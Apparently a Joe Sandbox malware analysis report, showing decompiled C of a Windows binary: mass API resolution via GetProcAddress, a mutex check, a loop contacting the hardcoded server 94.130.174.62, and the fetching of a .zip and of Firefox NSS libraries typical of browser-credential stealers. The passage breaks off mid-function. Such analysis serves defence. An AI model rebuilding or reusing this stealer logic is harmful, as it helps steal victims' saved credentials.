                                                                                					 *0x44a1f8 = GetProcAddress(_t133, "ShellExecuteExA");
                                                                                					 *0x44a164 = GetProcAddress(_t133, "SHFileOperationA");
                                                                                					_t30 = GetProcAddress(_t133, "SHGetFolderPathA");
                                                                                					 *0x44a1a8 = _t30;
                                                                                				}
                                                                                				_t134 = _v36;
                                                                                				if(_t134 != 0) {
                                                                                					 *0x44a230 = GetProcAddress(_t134, "PathMatchSpecW");
                                                                                					 *0x44a12c = GetProcAddress(_t134, "PathMatchSpecA");
                                                                                					 *0x44a1d8 = GetProcAddress(_t134, "StrCmpCA");
                                                                                					 *0x44a0e4 = GetProcAddress(_t134, "StrStrA");
                                                                                					_t30 = GetProcAddress(_t134, "PathFindFileNameA");
                                                                                					 *0x44a108 = _t30;
                                                                                				}
                                                                                				if(_v8 != 0) {
                                                                                					_t31 = GetProcAddress(_v8, "SymMatchString");
                                                                                					 *0x44a170 = _t31;
                                                                                					return _t31;
                                                                                				}
                                                                                				return _t30;
                                                                                			}





























                                                                                0x00419c28
                                                                                0x00419c2e

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,4124C941), ref: 00419481
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041949E
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004194AC
                                                                                • GetProcAddress.KERNEL32(00000000,CreateThread), ref: 004194C7
                                                                                • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004194D8
                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004194E9
                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 004194FA
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemInfo), ref: 0041950B
                                                                                • GetProcAddress.KERNEL32(00000000,WideCharToMultiByte), ref: 0041951C
                                                                                • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 0041952D
                                                                                • GetProcAddress.KERNEL32(00000000,HeapAlloc), ref: 0041953E
                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessHeap), ref: 0041954F
                                                                                • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00419560
                                                                                • GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 00419571
                                                                                • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00419582
                                                                                • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00419593
                                                                                • GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 004195A4
                                                                                • GetProcAddress.KERNEL32(00000000,lstrlenA), ref: 004195B5
                                                                                • GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 004195C6
                                                                                • GetProcAddress.KERNEL32(00000000,lstrcpyA), ref: 004195D7
                                                                                • GetProcAddress.KERNEL32(00000000,MultiByteToWideChar), ref: 004195E8
                                                                                • GetProcAddress.KERNEL32(00000000,lstrcatA), ref: 004195F9
                                                                                • GetProcAddress.KERNEL32(00000000,FindFirstFileA), ref: 0041960A
                                                                                • GetProcAddress.KERNEL32(00000000,FindNextFileA), ref: 0041961B
                                                                                • GetProcAddress.KERNEL32(00000000,FindClose), ref: 0041962C
                                                                                • GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 0041963D
                                                                                • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0041964E
                                                                                • GetProcAddress.KERNEL32(00000000,lstrcpynA), ref: 0041965F
                                                                                • GetProcAddress.KERNEL32(00000000,GlobalLock), ref: 00419670
                                                                                • GetProcAddress.KERNEL32(00000000,GlobalSize), ref: 00419681
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,4124C941), ref: 00419693
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,4124C941), ref: 004196A1
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,4124C941), ref: 004196B0
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,4124C941), ref: 004196BE
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,4124C941), ref: 004196CC
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,4124C941), ref: 004196DB
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,4124C941), ref: 004196EA
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,4124C941), ref: 004196F9
                                                                                • LoadLibraryA.KERNEL32(shell32.dll,?,?,?,?,?,?,?,4124C941), ref: 00419707
                                                                                • LoadLibraryA.KERNEL32(shlwapi.dll,?,?,?,?,?,?,?,4124C941), ref: 00419715
                                                                                • LoadLibraryA.KERNEL32(dbghelp.dll,?,?,?,?,?,?,?,4124C941), ref: 00419723
                                                                                • LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?,?,?,?,?,4124C941), ref: 00419731
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419742
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419754
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419766
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419778
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041978A
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041979C
                                                                                • GetProcAddress.KERNEL32(?), ref: 004197B5
                                                                                • GetProcAddress.KERNEL32(?,CryptBinaryToStringA), ref: 004197C6
                                                                                • GetProcAddress.KERNEL32(?,CryptStringToBinaryA), ref: 004197D7
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004197F1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419803
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419815
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419827
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419839
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041984B
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041985D
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041986F
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419881
                                                                                • GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 00419892
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004198AC
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004198BE
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004198D0
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004198E2
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004198F4
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419906
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419918
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041992A
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041993C
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041994E
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419960
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419972
                                                                                • GetProcAddress.KERNEL32(00000000,InternetCrackUrlA), ref: 00419983
                                                                                • GetProcAddress.KERNEL32(?), ref: 0041999D
                                                                                • GetProcAddress.KERNEL32(?), ref: 004199AF
                                                                                • GetProcAddress.KERNEL32(?), ref: 004199C1
                                                                                • GetProcAddress.KERNEL32(?), ref: 004199D3
                                                                                • GetProcAddress.KERNEL32(?), ref: 004199E5
                                                                                • GetProcAddress.KERNEL32(?), ref: 004199F7
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419A09
                                                                                • GetProcAddress.KERNEL32(4124C941), ref: 00419A22
                                                                                • GetProcAddress.KERNEL32(4124C941), ref: 00419A34
                                                                                • GetProcAddress.KERNEL32(4124C941,CoInitialize), ref: 00419A45
                                                                                • GetProcAddress.KERNEL32(4124C941,CreateStreamOnHGlobal), ref: 00419A56
                                                                                • GetProcAddress.KERNEL32(4124C941,GetHGlobalFromStream), ref: 00419A67
                                                                                • GetProcAddress.KERNEL32(?,GetDesktopWindow), ref: 00419A83
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419A95
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419AA7
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419AB9
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419ACB
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419ADD
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419AEF
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419B01
                                                                                • GetProcAddress.KERNEL32(?,GetWindowRect), ref: 00419B12
                                                                                • GetProcAddress.KERNEL32(?,GetWindowDC), ref: 00419B23
                                                                                • GetProcAddress.KERNEL32(?,CloseWindow), ref: 00419B34
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419B4D
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419B5F
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419B71
                                                                                • GetProcAddress.KERNEL32(?,ShellExecuteExA), ref: 00419B89
                                                                                • GetProcAddress.KERNEL32(?,SHFileOperationA), ref: 00419B9A
                                                                                • GetProcAddress.KERNEL32(?,SHGetFolderPathA), ref: 00419BAB
                                                                                • GetProcAddress.KERNEL32(?,PathMatchSpecW), ref: 00419BC3
                                                                                • GetProcAddress.KERNEL32(?,PathMatchSpecA), ref: 00419BD4
                                                                                • GetProcAddress.KERNEL32(?,StrCmpCA), ref: 00419BE5
                                                                                • GetProcAddress.KERNEL32(?,StrStrA), ref: 00419BF6
                                                                                • GetProcAddress.KERNEL32(?,PathFindFileNameA), ref: 00419C07
                                                                                • GetProcAddress.KERNEL32(00000000,SymMatchString), ref: 00419C22
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: CloseHandle$CloseWindow$CoInitialize$CreateFileA$CreateMutexA$CreateStreamOnHGlobal$CreateThread$CryptBinaryToStringA$CryptStringToBinaryA$FindClose$FindFirstFileA$FindNextFileA$GetDesktopWindow$GetDriveTypeA$GetFileSize$GetHGlobalFromStream$GetLastError$GetLogicalDriveStringsA$GetProcessHeap$GetSystemInfo$GetUserDefaultLocaleName$GetWindowDC$GetWindowRect$GlobalLock$GlobalMemoryStatusEx$GlobalSize$HeapAlloc$InternetCrackUrlA$IsWow64Process$LocalFree$MultiByteToWideChar$PathFindFileNameA$PathMatchSpecA$PathMatchSpecW$ReadFile$RegEnumValueA$SHFileOperationA$SHGetFolderPathA$ShellExecuteExA$StrCmpCA$StrStrA$SymMatchString$WideCharToMultiByte$dbghelp.dll$gdiplus.dll$lstrcatA$lstrcpyA$lstrcpynA$lstrlenA$shell32.dll$shlwapi.dll
                                                                                • API String ID: 2238633743-4036764532
                                                                                • Opcode ID: 69b6baf35303f61df93d5ac65a9a2727521236eeb362dffef702e27190b6bdd7
                                                                                • Instruction ID: 07f7832c0971b884e85a4eddeb3f16a50d4046e20dfd1343392049383cda5db0
                                                                                • Opcode Fuzzy Hash: 69b6baf35303f61df93d5ac65a9a2727521236eeb362dffef702e27190b6bdd7
                                                                                • Instruction Fuzzy Hash: EB12987D985214AFE7019FB0AD4996B3BB5FB0B701B18853AF901D2270D7B94820EF5E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                [Figure: control-flow graph of the function at 0040B5AD; legend: Executed, Not Executed]
                                                                                C-Code - Quality: 81%
                                                                                			E0040B5AD(void* __ecx, long __edx, void* __eflags, void* __fp0) {
                                                                                				char _v8;
                                                                                				char _v12;
                                                                                				char _v16;
                                                                                				signed int _v24;
                                                                                				char _v28;
                                                                                				char _v32;
                                                                                				char _v36;
                                                                                				char _v40;
                                                                                				char _v52;
                                                                                				char _v56;
                                                                                				char _v60;
                                                                                				intOrPtr _v72;
                                                                                				signed int _v80;
                                                                                				char _v100;
                                                                                				char _v108;
                                                                                				char _v112;
                                                                                				char _v128;
                                                                                				char _v164;
                                                                                				char _v168;
                                                                                				char _v176;
                                                                                				char _v180;
                                                                                				char _v212;
                                                                                				char _v220;
                                                                                				char _v244;
                                                                                				char _v268;
                                                                                				char _v296;
                                                                                				char _v300;
                                                                                				char _v324;
                                                                                				char _v332;
                                                                                				char _v380;
                                                                                				char _v404;
                                                                                				char _v408;
                                                                                				char _v444;
                                                                                				char _v448;
                                                                                				char _v464;
                                                                                				char _v472;
                                                                                				char _v488;
                                                                                				char _v492;
                                                                                				char _v520;
                                                                                				char _v548;
                                                                                				char _v556;
                                                                                				char _v576;
                                                                                				char _v604;
                                                                                				char _v612;
                                                                                				char _v616;
                                                                                				char _v632;
                                                                                				char _v640;
                                                                                				char _v644;
                                                                                				char _v688;
                                                                                				char _v696;
                                                                                				char _v732;
                                                                                				char _v740;
                                                                                				char _v744;
                                                                                				char _v752;
                                                                                				char _v772;
                                                                                				char _v796;
                                                                                				char _v800;
                                                                                				char _v808;
                                                                                				char _v832;
                                                                                				char _v836;
                                                                                				char _v856;
                                                                                				char _v864;
                                                                                				char _v892;
                                                                                				char _v912;
                                                                                				char _v920;
                                                                                				char _v940;
                                                                                				char _v948;
                                                                                				char _v960;
                                                                                				long _v964;
                                                                                				char _v968;
                                                                                				char _v980;
                                                                                				char _v1000;
                                                                                				char _v1012;
                                                                                				intOrPtr _v1024;
                                                                                				char _v1028;
                                                                                				CHAR* _v1044;
                                                                                				char _v1048;
                                                                                				intOrPtr _v1072;
                                                                                				long _v1076;
                                                                                				char _v1084;
                                                                                				char _v1092;
                                                                                				char _v1095;
                                                                                				char _v1096;
                                                                                				char _v1097;
                                                                                				char _v1098;
                                                                                				char _v1099;
                                                                                				char _v1100;
                                                                                				intOrPtr _v1116;
                                                                                				char _v1120;
                                                                                				char _v1124;
                                                                                				char _v1128;
                                                                                				char _v1136;
                                                                                				char _v1148;
                                                                                				char _v1160;
                                                                                				intOrPtr _v1162;
                                                                                				long _v1166;
                                                                                				void* _v1168;
                                                                                				long _v1170;
                                                                                				short _v1172;
                                                                                				intOrPtr _v1176;
                                                                                				CHAR* _v1180;
                                                                                				intOrPtr _v1184;
                                                                                				struct _SHFILEOPSTRUCT _v1188;
                                                                                				int _v1192;
                                                                                				void _v1196;
                                                                                				void _v1200;
                                                                                				int _v1204;
                                                                                				long _v1208;
                                                                                				long _v1212;
                                                                                				long _v1216;
                                                                                				int _v1220;
                                                                                				intOrPtr _v1224;
                                                                                				char* _v1228;
                                                                                				int _v1232;
                                                                                				long _v1240;
                                                                                				intOrPtr _v1244;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t236;
                                                                                				signed int _t238;
                                                                                				void _t245;
                                                                                				void* _t246;
                                                                                				CHAR* _t256;
                                                                                				void* _t257;
                                                                                				long _t258;
                                                                                				char _t262;
                                                                                				void* _t263;
                                                                                				char _t264;
                                                                                				void* _t265;
                                                                                				void _t266;
                                                                                				void* _t267;
                                                                                				CHAR* _t274;
                                                                                				CHAR* _t276;
                                                                                				CHAR* _t279;
                                                                                				void* _t282;
                                                                                				intOrPtr* _t284;
                                                                                				void* _t285;
                                                                                				void* _t292;
                                                                                				void* _t294;
                                                                                				void* _t295;
                                                                                				void* _t298;
                                                                                				intOrPtr* _t300;
                                                                                				void* _t301;
                                                                                				intOrPtr _t307;
                                                                                				intOrPtr* _t309;
                                                                                				intOrPtr* _t313;
                                                                                				intOrPtr* _t317;
                                                                                				intOrPtr* _t321;
                                                                                				intOrPtr* _t325;
                                                                                				intOrPtr* _t329;
                                                                                				CHAR* _t333;
                                                                                				CHAR* _t337;
                                                                                				CHAR* _t341;
                                                                                				CHAR* _t345;
                                                                                				CHAR* _t349;
                                                                                				CHAR* _t353;
                                                                                				CHAR* _t357;
                                                                                				char _t361;
                                                                                				char _t362;
                                                                                				char _t363;
                                                                                				char _t364;
                                                                                				char _t365;
                                                                                				CHAR* _t370;
                                                                                				CHAR* _t376;
                                                                                				CHAR* _t379;
                                                                                				void* _t383;
                                                                                				intOrPtr* _t384;
                                                                                				intOrPtr* _t388;
                                                                                				char* _t393;
                                                                                				signed int _t398;
                                                                                				CHAR* _t401;
                                                                                				void* _t409;
                                                                                				char* _t415;
                                                                                				char* _t418;
                                                                                				char* _t421;
                                                                                				char* _t423;
                                                                                				char* _t425;
                                                                                				char* _t434;
                                                                                				CHAR* _t440;
                                                                                				CHAR* _t444;
                                                                                				intOrPtr* _t447;
                                                                                				char _t452;
                                                                                				void* _t453;
                                                                                				char _t454;
                                                                                				void* _t455;
                                                                                				void* _t460;
                                                                                				void* _t463;
                                                                                				void* _t464;
                                                                                				char _t481;
                                                                                				char* _t550;
                                                                                				int _t565;
                                                                                				char* _t566;
                                                                                				long _t579;
                                                                                				void* _t580;
                                                                                				CHAR* _t582;
                                                                                				char _t583;
                                                                                				CHAR* _t605;
                                                                                				BYTE* _t606;
                                                                                				char* _t607;
                                                                                				void* _t608;
                                                                                				void* _t609;
                                                                                				intOrPtr _t629;
                                                                                				_Unknown_base(*)()* _t630;
                                                                                				void* _t633;
                                                                                				signed int _t636;
                                                                                				signed int _t638;
                                                                                				int _t639;
                                                                                				void _t640;
                                                                                				void* _t641;
                                                                                				void* _t642;
                                                                                				long _t643;
                                                                                				void* _t647;
                                                                                				void* _t648;
                                                                                				long _t649;
                                                                                				signed int _t650;
                                                                                				long _t651;
                                                                                				long _t652;
                                                                                				long _t653;
                                                                                				long _t654;
                                                                                				long _t655;
                                                                                				void _t656;
                                                                                				void* _t657;
                                                                                				void* _t667;
                                                                                
                                                                                				_t667 = __fp0;
                                                                                				_t657 = __eflags;
                                                                                				_t579 = __edx;
                                                                                				_t464 = __ecx;
                                                                                				_push(0xffffffff);
                                                                                				_push(E0043791D);
                                                                                				_push( *[fs:0x0]);
                                                                                				_t638 = (_t636 & 0xfffffff8) - 0x4a0;
                                                                                				_t236 =  *0x447674; // 0x4124c941
                                                                                				_v24 = _t236 ^ _t638;
                                                                                				_push(_t460);
                                                                                				_push(_t580);
                                                                                				_t238 =  *0x447674; // 0x4124c941
                                                                                				_push(_t238 ^ _t638);
                                                                                				 *[fs:0x0] =  &_v16;
                                                                                				_v960 = 0xf;
                                                                                				_v964 = 0;
                                                                                				_v980 = 0;
                                                                                				_v8 = 0;
                                                                                				 *0x44a044 = 0;
                                                                                				 *0x44a050 = 0;
                                                                                				 *0x44a04c = 0;
                                                                                				 *0x44a054 = 0;
                                                                                				 *0x44a03c = 0;
                                                                                				E0040115A(); // executed
                                                                                				E00419473(); // executed
                                                                                				_t245 = E00415610( &_v52); // executed
                                                                                				_v1196 = _t245;
                                                                                				_v12 = 1;
                                                                                				_t246 = E00415BB2(_t460, _t580,  &_v112, _t657);
                                                                                				_v12 = 2;
                                                                                				E0041551F( &_v168, _t464, __edx, _t580, _t246, _t657);
                                                                                				_v12 = 3;
                                                                                				E0040D431(_t246,  &_v644);
                                                                                				_v12 = 4;
                                                                                				_t582 =  &_v1012;
                                                                                				E0040D431(_v1196, _t582);
                                                                                				E00402C34( &_v644, 1, 0);
                                                                                				E00402C34( &_v176, 1, 0);
                                                                                				E00402C34( &_v128, 1, 0);
                                                                                				_t470 =  &_v80;
                                                                                				_v36 = 9;
                                                                                				E00402C34( &_v80, 1, 0);
                                                                                				_t256 = _v1044;
                                                                                				if(_v1024 < 0x10) {
                                                                                					_t256 = _t582;
                                                                                				}
                                                                                				_t257 = CreateMutexA(0, 0, _t256); // executed
                                                                                				_v1168 = _t257;
                                                                                				_t258 = GetLastError();
                                                                                				_t659 = _t258 - 0xb7;
                                                                                				if(_t258 == 0xb7) { // 0xb7 = ERROR_ALREADY_EXISTS: the named mutex already exists
                                                                                					Sleep(0x7530); // 0x7530 ms = 30 seconds
                                                                                				}
                                                                                				_t583 = "94.130.174.62";
                                                                                				while(1) {
                                                                                					_push("|");
                                                                                					_t639 = _t638 - 0x1c;
                                                                                					_v1192 = _t639;
                                                                                					E00407DCB(_t639);
                                                                                					_t640 = _t639 - 0x1c;
                                                                                					_t616 = _t640;
                                                                                					_v8 = 0xa;
                                                                                					_v1196 = _t640;
                                                                                					E00407E11(_t640);
                                                                                					_v8 = 9;
                                                                                					E0040A83E(0, _t470, _t583, _t640, _t659);
                                                                                					_t262 = "94.130.174.62"; // 0x312e3439
                                                                                					_t641 = _t640 + 0x3c;
                                                                                					if( *0x448530 < 0x10) {
                                                                                						_t262 = _t583;
                                                                                					}
                                                                                					_t263 =  *0x44a1d8(_t262, "ERROR");
                                                                                					_t661 = _t263;
                                                                                					if(_t263 != 0) {
                                                                                						_t656 = _t641 - 0x1c;
                                                                                						_t616 = _t656;
                                                                                						_v1200 = _t656;
                                                                                						E0040410F(_t656, _t583);
                                                                                						E0040A958(0, _t470, _t583, _t656, _t661);
                                                                                						_t641 = _t656 + 0x1c;
                                                                                					}
                                                                                					_t264 = "94.130.174.62"; // 0x312e3439
                                                                                					if( *0x448530 < 0x10) {
                                                                                						_t264 = _t583;
                                                                                					}
                                                                                					_t265 =  *0x44a1d8(_t264, "ERROR");
                                                                                					_t663 = _t265;
                                                                                					if(_t265 != 0) {
                                                                                						break;
                                                                                					}
                                                                                					_push("|");
                                                                                					_t653 = _t641 - 0x1c;
                                                                                					_v1208 = _t653;
                                                                                					E00407DEE(_t653);
                                                                                					_t654 = _t653 - 0x1c;
                                                                                					_t616 = _t654;
                                                                                					_v24 = 0xb;
                                                                                					_v1212 = _t654;
                                                                                					E00407E11(_t654);
                                                                                					_v24 = 9;
                                                                                					E0040A83E(0, _t470, _t583, _t654, _t663);
                                                                                					_t452 = "94.130.174.62"; // 0x312e3439
                                                                                					_t641 = _t654 + 0x3c;
                                                                                					if( *0x448530 < 0x10) {
                                                                                						_t452 = _t583;
                                                                                					}
                                                                                					_t453 =  *0x44a1d8(_t452, "ERROR");
                                                                                					_t665 = _t453;
                                                                                					if(_t453 != 0) {
                                                                                						_t655 = _t641 - 0x1c;
                                                                                						_t616 = _t655;
                                                                                						_v1216 = _t655;
                                                                                						E0040410F(_t655, _t583);
                                                                                						E0040A958(0, _t470, _t583, _t655, _t665);
                                                                                						_t641 = _t655 + 0x1c;
                                                                                					}
                                                                                					_t454 = "94.130.174.62"; // 0x312e3439
                                                                                					if( *0x448530 < 0x10) {
                                                                                						_t454 = _t583;
                                                                                					}
                                                                                					_t455 =  *0x44a1d8(_t454, "ERROR");
                                                                                					_t659 = _t455;
                                                                                					if(_t455 != 0) {
                                                                                						break;
                                                                                					} else {
                                                                                						Sleep(0x1d4c0);
                                                                                						continue;
                                                                                					}
                                                                                				}
                                                                                				_push(3);
                                                                                				_push(0);
                                                                                				_t266 = E0041D251(0, 0x6400000, _t616, __eflags);
                                                                                				_push(0x13);
                                                                                				_v1196 = _t266;
                                                                                				_t267 = E00417368(0,  &_v488, _t579, 0x6400000, _t616, __eflags);
                                                                                				_v28 = 0xe;
                                                                                				E0040CFB8(0x448570, _t267);
                                                                                				_v28 = 9;
                                                                                				E00402C34( &_v492, 1, 0);
                                                                                				_push( *0x449ee0);
                                                                                				_push( &_v892);
                                                                                				_t618 = E0040D47C(0, 0x448570, _t267, __eflags);
                                                                                				_v36 = 0xf;
                                                                                				E0040CFB8(0x44858c, _t271);
                                                                                				_v36 = 9;
                                                                                				E00402C34( &_v892, 1, 0);
                                                                                				__eflags =  *0x4485a0 - 0x10;
                                                                                				_t274 =  *0x44858c; // 0x0
                                                                                				if( *0x4485a0 < 0x10) {
                                                                                					_t274 = 0x44858c;
                                                                                				}
                                                                                				CreateDirectoryA(_t274, 0);
                                                                                				__eflags =  *0x4485a0 - 0x10;
                                                                                				_t276 =  *0x44858c; // 0x0
                                                                                				if(__eflags < 0) {
                                                                                					_t276 = 0x44858c;
                                                                                				}
                                                                                				SetCurrentDirectoryA(_t276);
                                                                                				_push("\\files");
                                                                                				_push( &_v268);
                                                                                				_t279 = E0040D337(0, 0x44858c, _t618, __eflags);
                                                                                				__eflags = _t279[0x14] - 0x10;
                                                                                				if(_t279[0x14] >= 0x10) {
                                                                                					_t279 =  *_t279;
                                                                                				}
                                                                                				CreateDirectoryA(_t279, 0);
                                                                                				E00402C34( &_v268, 1, 0);
                                                                                				_t282 = E00407D85( &_v444);
                                                                                				_t620 = "/";
                                                                                				_v36 = 0x10;
                                                                                				_t284 = E0040D3FA( &_v268,  &_v836, "/", _t282);
                                                                                				_t642 = _t641 + 0xc;
                                                                                				_v36 = 0x11;
                                                                                				__eflags =  *((intOrPtr*)(_t284 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t284 + 0x14)) >= 0x10) {
                                                                                					_t284 =  *_t284;
                                                                                				}
                                                                                				__eflags =  *0x448530 - 0x10;
                                                                                				_t481 = "94.130.174.62"; // 0x312e3439
                                                                                				if( *0x448530 < 0x10) {
                                                                                					_t481 = "94.130.174.62";
                                                                                				}
                                                                                				_push(_t284);
                                                                                				_t285 = E0040ED7D(_t481, _t579);
                                                                                				_t643 = _t642 - 0x18;
                                                                                				_v1212 = _t643;
                                                                                				E0040C606(_t643, _t285);
                                                                                				E00407FEB(0, 0x44858c, _t620, __eflags);
                                                                                				E00402C34( &_v832, 1, 0);
                                                                                				_v40 = 9;
                                                                                				E00402C34( &_v448, 1, 0);
                                                                                				_v1116 = 0xf;
                                                                                				_v1120 = 0;
                                                                                				_v1136 = 0;
                                                                                				E0040381A( &_v1136,  *0x449ee0);
                                                                                				_push("http://");
                                                                                				_push( &_v404);
                                                                                				_v52 = 0x12;
                                                                                				_t292 = E0040D47C(0, "94.130.174.62", _t620, __eflags);
                                                                                				_v52 = 0x13;
                                                                                				_t294 = E0040D3C3( &_v1136,  &_v740, _t292, _t620);
                                                                                				_t295 = 0xa;
                                                                                				_v52 = 0x14;
                                                                                				_t298 = E0040D3C3( &_v1136,  &_v180, _t294, E00417319(_t295, __eflags));
                                                                                				_v52 = 0x15;
                                                                                				_t300 = E0040D3C3( &_v1136,  &_v796, _t298, ".zip");
                                                                                				_t647 = _t643 + 0x48;
                                                                                				_v52 = 0x16;
                                                                                				__eflags =  *((intOrPtr*)(_t300 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t300 + 0x14)) >= 0x10) {
                                                                                					_t300 =  *_t300;
                                                                                				}
                                                                                				_t301 = E0040EF26(_t300);
                                                                                				_v1208 = _t579;
                                                                                				E00402C34( &_v772, 1, 0);
                                                                                				E00402C34( &_v164, 1, 0);
                                                                                				E00402C34( &_v732, 1, 0);
                                                                                				_v52 = 0x12;
                                                                                				E00402C34( &_v404, 1, 0);
                                                                                				_push(_v1240);
                                                                                				_push(_t301);
                                                                                				 *0x44a040 = E00407B7E(0, _t579, _t301, 1, __eflags);
                                                                                				_t307 = E0040AA08(0, 0x43e028, 0);
                                                                                				_t648 = _t647 + 0xc;
                                                                                				_v1244 = _t307;
                                                                                				_push("\\vcruntime140.dll");
                                                                                				_push( &_v1000);
                                                                                				_v1240 = _t579;
                                                                                				_t309 = E0040D337(0,  &_v1148, 1, __eflags);
                                                                                				_v60 = 0x17;
                                                                                				__eflags =  *((intOrPtr*)(_t309 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t309 + 0x14)) >= 0x10) {
                                                                                					_t309 =  *_t309;
                                                                                				}
                                                                                				E0040AA08(0, _t309, 1);
                                                                                				_v28 = 0x12;
                                                                                				E00402C34( &_v968, 1, 0);
                                                                                				_push("\\softokn3.dll");
                                                                                				_push( &_v220);
                                                                                				_t313 = E0040D337(0,  &_v1124, 1, __eflags);
                                                                                				_v36 = 0x18;
                                                                                				__eflags =  *((intOrPtr*)(_t313 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t313 + 0x14)) >= 0x10) {
                                                                                					_t313 =  *_t313;
                                                                                				}
                                                                                				E0040AA08(0, _t313, 1);
                                                                                				_v28 = 0x12;
                                                                                				E00402C34( &_v212, 1, 0);
                                                                                				_push("\\nss3.dll");
                                                                                				_push( &_v612);
                                                                                				_t317 = E0040D337(0,  &_v1124, 1, __eflags);
                                                                                				_v36 = 0x19;
                                                                                				__eflags =  *((intOrPtr*)(_t317 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t317 + 0x14)) >= 0x10) {
                                                                                					_t317 =  *_t317;
                                                                                				}
                                                                                				E0040AA08(0, _t317, 1);
                                                                                				_v28 = 0x12;
                                                                                				E00402C34( &_v604, 1, 0);
                                                                                				_push("\\msvcp140.dll");
                                                                                				_push( &_v332);
                                                                                				_t321 = E0040D337(0,  &_v1124, 1, __eflags);
                                                                                				_v36 = 0x1a;
                                                                                				__eflags =  *((intOrPtr*)(_t321 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t321 + 0x14)) >= 0x10) {
                                                                                					_t321 =  *_t321;
                                                                                				}
                                                                                				E0040AA08(0, _t321, 1);
                                                                                				_v28 = 0x12;
                                                                                				E00402C34( &_v324, 1, 0);
                                                                                				_push("\\mozglue.dll");
                                                                                				_push( &_v556);
                                                                                				_t325 = E0040D337(0,  &_v1124, 1, __eflags);
                                                                                				_v36 = 0x1b;
                                                                                				__eflags =  *((intOrPtr*)(_t325 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t325 + 0x14)) >= 0x10) {
